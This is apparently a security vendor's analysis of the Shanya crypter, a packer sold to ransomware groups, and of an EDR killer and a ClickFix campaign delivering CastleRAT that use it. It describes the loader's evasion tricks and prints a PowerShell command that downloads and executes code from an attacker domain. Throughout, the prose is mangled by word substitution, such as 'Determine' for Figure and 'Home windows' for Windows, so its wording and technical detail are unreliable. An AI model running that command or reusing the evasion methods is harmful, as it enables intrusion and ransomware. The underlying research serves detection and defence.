We have now lined packer-as-a-service choices from the pc underworld prior to now, beforehand dissecting impersonation campaigns<\/a> and the rise of HeartCrypt<\/a>, each well-liked amongst ransomware teams. Nonetheless, it’s a fast-changing panorama, and now we’re watching a brand new incarnation of the identical sort of service: the Shanya crypter \u2014 already favored by ransomware teams and taking on (to a point) the position that HeartCrypt has performed within the ransomware toolkit. We\u2019ll have a look at its obvious origins, unpack the code, and study a focused an infection leveraging this software. Sophos protections towards this particular packer are lined on the finish of the article.<\/p>\n Close to the tip of 2024 we discovered references on underground boards to a brand new providing, VX Crypt, credited to an entity known as \u2018Shanya\u2019 (additionally the identify of a river in western Russia). It ought to be famous that the ID of the publish writer, which we\u2019ve obfuscated in Determine 1, was not \u201cShanya\u201d however one other string solely.<\/p>\n Determine 1: A posting in Russian lists the options of \u201cShanya\u2019s\u201d VX Crypt providing<\/em><\/p>\n The attention-grabbing a part of the English translation of the options reads as follows:<\/p>\n The contact tackle for the creator of the packer is a Telegram deal with that features the string \u201cshanya,\u201d as proven in Determine 2:<\/p>\n Determine 2: The publish offers \u201cShanya\u2019s\u201d Telegram contact info (however we don\u2019t)<\/em><\/p>\n The described function set matches traits of a packer that we now have present in quite a lot of samples, so we imagine that our samples include the identical packer-as-a-service that this publish identifies as coming from \u201cShanya.\u201d It is rather unlikely that two related choices would each be related to the identical identify.<\/p>\n The early samples of the crypter had varied artifacts left within the executable. For instance, a number of the early executable samples (hashes: 58995a6c6042ed15f765a11160690c45f76f8271, 83317a42290ef8577e1980dc6085ab789dcc0c8f<\/em>) contained an executable identify, shanya_crypter.exe, as proven on Line 1 in Determine 3:<\/p>\n Determine 3: Probably extra info than the Shanya builders meant to make obtainable, together with some unusual adjective decisions<\/em><\/p>\n Additional early DLL samples had revealing DLL names, consisting of a morphed type of \u201cShanya.\u201d Additionally they contained info on the aim of the crypter, which is to bypass the detection capabilities of no matter safety answer the goal could also be utilizing as proven in Determine 4:<\/p>\n Determine 4: The DLL samples embody a nasty phrase; this won’t be the final time dangerous phrases seem on this code<\/em><\/p>\n Among the different names (barely obfuscated under) have been:<\/p>\n This seems to be the identical packer famous<\/a> in late spring by Cipher Tech Options because the Armillaria loader, which was used to ship a handful of malware households together with BumbleBee, ChuChuka, Lumma, the WHT downloader, and StealC. In a while we discovered instances of a brand new EDR killer household and the CastleRAT backdoor utilizing malicious information created by this service.<\/p>\n Geographic distribution for nascent malware might be helpful info. In Shanya\u2019s case, we now have encountered the packer in all 4 hemispheres over the course of 2025, however evaluation of infections per capita in affected nations indicated a considerably increased prevalence in sure international locations late within the 12 months, as proven in Determine 5.<\/p>\n Determine 5: A distribution of Sophos-analyzed samples packed by Shanya throughout September-November 2025. Notice that this information contains each customer-operated machines and machines prone to be in use by individuals testing the packer throughout this era. Although Tunisia looms giant on this chart, UAE is the extra attention-grabbing case, detecting Shanya much more regularly than the similar-in-size (\u00b1 1.1 million) nations of the Czech Republic (Czechia), Austria, and Switzerland. We additional observe that every one the infections we noticed in China have been geolocated within the Hong Kong-adjacent Shenzen space. (Nations reporting Shanya detections however with <10000 Sophos gadgets in place have been excluded from this chart for legibility)<\/em><\/p>\n A lot of the following evaluation relies on the pattern with SHA256: 6645297a0a423564f99b9f474b0df234d6613d04df48a94cb67f541b8eb829d1, which is a variant of the EDR killer we’ll talk about later.<\/p>\n The loader code is very obfuscated, with miles of junk code akin to this:<\/p>\n Determine 6: The junk code flows like a river (maybe the Shanya)<\/em><\/p>\n The aim of this code is to construct a decryptor and loader in a reminiscence area, which might then decrypt the payload.<\/p>\n Shanya begins by initializing a desk construction that accommodates essential information, akin to API addresses, that it’s going to require. It then makes use of an offset to the GdiHandleBuffer discipline within the PEB (Course of Setting Block) as a safe pointer repository for the tackle of that desk. The next levels of the malware solely have to name getPEB() and browse from a hard and fast, hardcoded offset (GdiHandleBuffer[46]) to immediately retrieve the complicated configuration desk, permitting for seamless and untraceable execution continuity. This construction can be utilized by the subsequent stage, by which the shellcode performs the decoding course of.<\/p>\n Determine 7: Calling again to the desk smooths execution stream, making the malware much less noticeable<\/em><\/p>\n As with different malware, Shanya dynamically resolves required Home windows API capabilities by first parsing the PEB to find the PEB_LDR_DATA construction, which accommodates the linked lists of all loaded modules. Utilizing a customized hashing algorithm, it then parses all export names till a match is discovered. That algorithm varies from pattern to pattern.<\/p>\n Shanya calls RtlDeleteFunctionTable(0) & RtlDeleteFunctionTable(1) to carry out an anti-analysis examine. By triggering the perform with an invalid context, the malware makes an attempt to induce an unhandled exception or crash if working below a user-mode debugger, thereby disrupting automated sandboxes and terminating handbook evaluation makes an attempt earlier than the payload might be absolutely executed.<\/p>\n Shanya checks whether or not RtlDeleteFunctionTable is hooked by an EDR. Whether it is hooked, it calculates the tackle which factors previous the EDR\u2019s trampoline and skip to the unique, unhooked directions of RtlDeleteFunctionTable.<\/p>\n Determine 8: In search of the hook<\/em><\/p>\n The next screenshot exhibits the intermediate type of the payload, when it’s already decrypted however nonetheless in compressed type in reminiscence:<\/p>\n Determine 9: The payload is in place, however this isn\u2019t even its closing type<\/em><\/p>\n It’s then decompressed and loaded.<\/p>\n The loader hundreds a second occasion of a Home windows system DLL. In all of the instances we analyzed, this technique part was shell32.dll.\u00a0Determine 10 exhibits the module itemizing in x64dbg as an example that there are certainly two cases of shell32.dll within the reminiscence.<\/p>\n Determine 10: Yet one more occasion of shell32.dll than must be there<\/em><\/p>\n Determine 11 exhibits the unique DLL, loaded into the DLL reminiscence house:<\/p>\n Determine 11: A DLL the place a DLL ought to be\u2026<\/em><\/p>\n And Determine 12 exhibits a second copy, loaded into the consumer code reminiscence house.<\/p>\n Determine 12: \u2026and a DLL the place a DLL shouldn’t be<\/em><\/p>\n The 2 are apparently equivalent, with the identical PE part names and sizes. However in actuality, the start of the picture (virtually talking, the header and the .textual content part) is overwritten by the content material of the decrypted payload, after which loaded by the undocumented LdrLoadDll Home windows perform.<\/p>\n The unique exported capabilities include junk information, as proven in Determine 13:<\/p>\n Determine 13: The \u201ccopy\u201d within the consumer code reminiscence house, with its junk information<\/em><\/p>\n The loader then performs another trick, modifying the entry of the loaded module listing (LDR_MODULE).<\/p>\n Each the complete DLL identify and the bottom DLL identify are modified, because the Determine 14 picture of the LDR_DATA_TABLE_ENTRY construction exhibits:<\/p>\n Determine 14: Mustard?<\/em><\/p>\n The modified DLL picture is flagged by the PE-SIEVE<\/a> software (developed by hasherezade):<\/p>\n In an earlier iteration of the EDR killer the wmp.dll identify was used, as proven in Determine 15:<\/p>\n Determine 15: The wmp.dll identify within the feedback<\/em><\/p>\n In different instances a special identify was utilized, incorporating a direct (and offensive) callout to hasherezade:<\/p>\n Determine 16: That\u2019s undoubtedly not \u201cwmp.dll\u201d below the black containers within the feedback<\/em><\/p>\n In one other case, this time involving a 32-bit loader (the payload was StealC), the shanya.dll identify was used:<\/p>\n Determine 17: A 3rd instance has nothing price blacking out<\/em><\/p>\n The principle traits of the Shanya-protected EDR killer are as follows.<\/p>\n It has been utilized in DLL side-loading eventualities, mostly together with two particular information:<\/p>\n In different instances, the side-loaded DLL has been named model.dll, rtworkq.dll, or wmsgapi.dll.<\/p>\n It drops two kernel drivers:<\/p>\n The user-mode loader\/orchestrator of the user-mode killer is msimg32.dll. First it hundreds the weak clear driver, as proven in Determine 18:<\/p>\n Determine 18: Loading the ThrottleStop driver<\/em><\/p>\n Then, as proven in Determine 19, it hundreds the malicious driver:<\/p>\n Determine 19: The malicious driver is loaded subsequent<\/em><\/p>\n The user-mode killer has a big listing of focused providers, as proven in Determine 20:<\/p>\n Determine 20: So many focused providers <\/em><\/p>\n And processes:<\/p>\n Determine 21: A protracted listing of processes, together with some belonging to Sophos. (That doesn\u2019t imply the try is profitable, however we\u2019ll get into that in a second)<\/em><\/p>\n These service and course of names belong to safety merchandise which might be focused by the EDR killer. The consumer mode killer searches the working processes and put in providers. If it finds a match, it sends a kill command to the malicious kernel driver, as proven in Determine 22:<\/p>\n Determine 22: Making an attempt to smite the safety merchandise it finds<\/em><\/p>\n The malicious kernel driver abuses the weak clear driver, gaining write entry that allows the termination and deletion of the processes and providers of the safety merchandise as proven in Determine 23:<\/p>\n Determine 23: And the shutdown<\/em><\/p>\n In a typical situation, we see this form of exercise paired with a ransomware an infection.\u00a0The method tree in Determine 24 exhibits, for example, the deployment of the Akira ransomware, together with makes an attempt to execute two completely different variations of the EDR killer, each in DLL side-loading eventualities:<\/p>\n Determine 24: The method by which the EDR killer clears the best way for a ransomware an infection, on this case Akira. (The F\u2019s point out the variety of information written or learn)<\/em><\/p>\n The primary deployment we famous of this EDR killer occurred close to the tip of April 2025, in a Medusa assault (as proven in Determine 25). It has been utilized in a number of ransomware operations since then, most regularly by Akira (as described by<\/a> GuidePoint Safety in August), but in addition by Qilin<\/a> and Crytox<\/a>.<\/p>\n Determine 25: A distribution of Shanya-involved instances analyzed between April and November 2025, week by week<\/em><\/p>\n To present a way of how this packer manifests within the wild, we\u2019ll look briefly at a malware distribution marketing campaign that utilized Shanya, on this case to focus on accommodations.<\/p>\n It was reported<\/a> in September 2025 as a part of a reserving.com-themed ClickFix marketing campaign, as proven in Determine 26:<\/p>\n Determine 26: Experiences of the an infection appeared on a social media website; the Polish-language \u201cverification\u201d display screen proven within the decrease half of the picture tips the focused consumer into loading malicious code<\/em><\/p>\n The file listing reported by the researcher, as proven in Determine 27, matches the information we now have seen:<\/p>\n Determine 27: Acquainted names, sadly<\/em><\/p>\n We additionally noticed {that a} PowerShell script was used to obtain the subsequent stage:<\/p>\n The upd<\/em> script downloaded and unpacked the consent.zip archive, which contained the DLL side-loading elements proven in Determine 28:<\/p>\n Determine 28: Beginning to look quite acquainted<\/em><\/p>\n We have now seen the next obtain servers in use:<\/p>\n The archive that was downloaded had the identify and hash 59906b022adfc6f63903adbdbb64c82881e0b1664d6b7f7ee42319019fcb3d7e: consa[.]zip . It registered for autostart after which executed the clear loader (consent.exe) as proven in Determine 29:<\/p>\n Determine 29: The clear loader abused<\/em><\/p>\n The clear executable then loaded the malicious DLL, named wmsgapi.dll, which was inflated by appended bytes to the massive dimension of 656MB. The ultimate payload right here has been recognized by<\/a> RecordedFuture as CastleRAT.<\/p>\n Sophos protections towards this malware embody, however should not restricted to, ATK\/Shanya-B, \u00a0ATK\/Shanya-C, and \u00a0ATK\/Shanya-D.<\/p>\n Packer-as-a-service choices and EDR killers will each be with us for the foreseeable future. The mixture of the 2 may be very well-liked with ransomware teams. As a result of there’s a want and a monetary motive, we will\u2019t count on this explicit malware sort to go away anytime quickly \u2013 and we’ll probably discover further-evolved variations sooner or later.<\/p>\nFirst glimpse: Underground promotions<\/h2>\n
![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig01.png\")
<\/a><\/p>\nNon-standard module loading into reminiscence<\/i><\/b>, wrapper over the system loaderStub uniqueization. <\/i>
\n
\nEvery buyer receives their very own (comparatively) distinctive stub<\/b> with a distinctive encryption algorithm upon buy<\/b>.<\/i>
\n
\nAMSI bypass in your .NET assemblies<\/i><\/b>; the payload isn't detected in reminiscence.Icons, model info, privilege escalation through manifest (UAC Bypass), Autorun with rerun can be found.Anti-VM, does not run in sandboxes, does not unpack within the cloud.<\/i>
\n
\nRuntime safety is offered<\/i><\/b> for native and 32-bit information (throughout testing). If it is a RAT (for instance), then with this safety it could actually run undetected for a very long time (_Indy impressed)\u00b7 <\/i>
\n
\nWe will strive sideloading with the proper software program<\/i><\/b>. It is attainable to load your file within the context of one other course of, nevertheless it takes time to search out vulnerabilities in the proper software program and time for testing.<\/i><\/pre>\n
![\"\"](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig02.png\")
<\/a><\/p>\nEarly samples of the crypter<\/h3>\n
![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig03.png\")
<\/a><\/p>\n![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig04.png\")
<\/a><\/p>\n\n
The place we noticed it<\/h3>\n
![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig05.png\")
<\/a><\/p>\nUnderneath the hood: The packed executables<\/h2>\n
![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig06.png\")
<\/a><\/p>\nHiding within the PEB<\/h3>\n
![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig07.png\")
<\/a><\/p>\nAPI hashing<\/h3>\n
Anti-analysis examine<\/h3>\n
![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig08.png\")
<\/a><\/p>\nPayload<\/h3>\n
![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig09.png\")
<\/a><\/p>\n![\"The](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig10.png\")
<\/a><\/p>\n![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig11.png\")
<\/a><\/p>\n![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig12.png\")
<\/a><\/p>\n![\"The](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig13.png\")
<\/a><\/p>\n![\"The](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig14.png\")
<\/a><\/p>\n\u00a0\u00a0\u00a0 \"mapping_scan\" : {
\n \u00a0\u00a0\u00a0 \"module\" : \"1ab0bbf0000\",
\n \u00a0\u00a0\u00a0 \"module_file\" : \"C:Home windowsSystem32mustard64.dll\",
\n \u00a0\u00a0\u00a0 \"mapped_file\" : \"C:Home windowsSystem32shell32.dll\",
\n \u00a0\u00a0\u00a0 \"standing\" : 1
\n \u00a0\u00a0 }
\n \u00a0 },
\n \u00a0 {
\n \u00a0\u00a0 \"headers_scan\" : {
\n \u00a0\u00a0\u00a0 \"standing\" : 1,
\n \u00a0\u00a0\u00a0 \"module\" : \"1ab0bbf0000\",
\n \u00a0\u00a0\u00a0 \"module_size\" : \"59000\",
\n \u00a0\u00a0\u00a0 \"module_file\" : \"C:Home windowsSystem32shell32.dll\",
\n \u00a0\u00a0\u00a0 \"is_connected_to_peb\" : 1,
\n \u00a0\u00a0\u00a0 \"is_pe_replaced\" : 1,
\n \u00a0\u00a0\u00a0 \"dos_hdr_modified\" : 1,
\n \u00a0\u00a0\u00a0 \"file_hdr_modified\" : 1,
\n \u00a0\u00a0\u00a0 \"nt_hdr_modified\" : 1,
\n \u00a0\u00a0\u00a0 \"ep_modified\" : 1,
\n \u00a0\u00a0\u00a0 \"sec_hdr_modified\" : 1
\n \u00a0\u00a0 }<\/pre>\n![\"The](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig15.png\")
<\/a><\/p>\n![\"The](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig16.png\")
<\/a><\/p>\n![\"The](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig17.png\")
<\/a><\/p>\nNotable use instances<\/h2>\n
EDR killer<\/h3>\n
\n
\n
![\"Loading](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig18.png\")
<\/a><\/p>\n![\"the](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig19.png\")
<\/a><\/p>\n![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig20.png\")
<\/a><\/p>\n![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig21.png\")
<\/a><\/p>\n![\"Shanya](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig22.png\")
<\/a><\/p>\n![\"The](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig23.png\")
<\/a><\/p>\n![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig24.jpg\")
<\/a><\/p>\n![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig25.png\")
<\/a><\/p>\nIn motion: CastleRAT<\/h3>\n
![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig26.png\")
<\/a><\/p>\n![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig27.png\")
<\/a><\/p>\nMalware identify:\u00a0\u00a0\u00a0 C2_10a (T1071.001)
\nBeacon time:\u00a0\u00a0\u00a0 2025-09-06T11:32:18.000Z
\nCommand line:\u00a0\u00a0\u00a0 powershell -w h -ep b -c \"iex (iwr 'biokdsl[.]com\/upd' -useb).Content material\"<\/pre>\n
![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig28.png\")
<\/a><\/p>\n\n
![\"A](\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/12\/shanya-fig29.png\")
<\/a><\/p>\nSophos protections<\/h2>\n
Conclusion<\/h2>\n
Indicators of compromise<\/h3>\n